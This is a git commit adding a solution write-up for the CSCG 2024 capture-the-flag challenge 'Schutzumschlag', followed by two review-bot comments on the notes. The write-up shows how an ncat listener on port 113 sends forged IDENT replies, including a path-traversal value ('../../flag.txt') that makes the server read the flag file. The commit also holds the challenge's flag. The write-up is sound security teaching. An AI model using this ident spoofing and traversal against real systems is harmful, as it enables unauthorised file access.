cscg24-schutzumschlag

CSCG 2024 Challenge 'Schutzumschlag'
git clone https://git.sinitax.com/sinitax/cscg24-schutzumschlag

commit f824f956e6c3cc9e8bb5a10330d20cc65fdcd696
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu, 14 Mar 2024 20:55:53 +0100

Add solution

Diffstat:
A chall/description | 5 +++++
A chall/flag | 1 +
A chall/notes | 46 ++++++++++++++++++++++++++++++++++++++++++++++
3 files changed, 52 insertions(+), 0 deletions(-)

diff --git a/chall/description b/chall/description @@ -0,0 +1,5 @@ +To make SSH on my server even more secure, I decided to use TCP wrappers (Schutzumschläge für TCP)! Feel free to check it out by connecting to it. And make sure to check the the debugging messages if the connection fails! Use the server below to connect to my main host, which runs on port 2000 localhost. Your user ctf has sudo privileges on the host provided below. + +The protected "schutzumschlag" host is available via ssh -p 2000 localhost. Per default, our networking uses IPv6 btw :) + +https://www.debian.org/doc/manuals/securing-debian-manual/tcpwrappers.de.html diff --git a/chall/flag b/chall/flag @@ -0,0 +1 @@ +CSCG{wr4p_4ll_th3_th1ngs:)} diff --git a/chall/notes b/chall/notes 
@@ -0,0 +1,46 @@ +Connect to the service + +By running `find /` we find out the flag file is in /flag.txt, +but the correct contents are on the victim machine we can access +via `ssh -p 2000 localhost`. + +Use `ssh -p 2000 localhost` to connect and get the following error: + +Connection to localhost (::1) 2000 port [tcp/*] succeeded! +######################################################################### +# # +# Unknown User! # +# # +######################################################################### +TCP Wrappers: Connection refused! Make sure that port 113 can be reached! +User: unknown +Client: ::1 +Hostname: localhost +Date: Thu Mar 14 19:50:09 UTC 2024 + +We open up port 113 using `ncat -6 -l -p 113` (ipv6 based on description hint) + +Next time we connect we get a single line from the victim: +36362,2000 + +Googling "service port 113" we find that this is the port for the IDENT +service which when given a src,dst port pair returns the user initiating +the connection. + +If we connect again and reply with `36362,2000 : USERID : UNIX : root` +we get the following instead: + +cat: /tmp/users/root: No such file or directory + +TCP Wrappers: Hello root ! +User: root +Client: ::1 +Hostname: localhost +Date: Thu Mar 14 19:49:50 UTC 2024 + +So for some reason, the user is used in a shell command to cat a file... + +Using path traversal we can read the flag: + +XXXXX,2000 : USERID : UNIX : ../../flag.txt +
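Review bot: chall/description has a doubled word in "make sure to check the the debugging messages". If the text is meant to be a verbatim copy of the organisers' wording, add a line saying so; otherwise drop the second "the".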
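Review bot: The final step of chall/notes leaves `XXXXX` unexplained and never states why `../../flag.txt` works, so the write-up cannot be followed from the notes alone. Say that `XXXXX` stands for the source port the server sends on that particular connection (the `36362` in the earlier example), and spell out the inference from `cat: /tmp/users/root: No such file or directory`: the name returned over ident is appended to `/tmp/users/`, so two `..` components resolve to `/flag.txt`. It would also help to name the root cause in one line, namely that the wrapper trusts the ident reply, which the connecting client controls because it runs the listener on port 113, and uses it unsanitised in a file path. The notes also end before showing the output of the last request, so nothing ties them to the value committed in chall/flag. Minor: the "Unknown User" transcript is dated 19:50:09 and the later "Hello root" transcript 19:49:50, so the two captures appear in the reverse of the order they were taken.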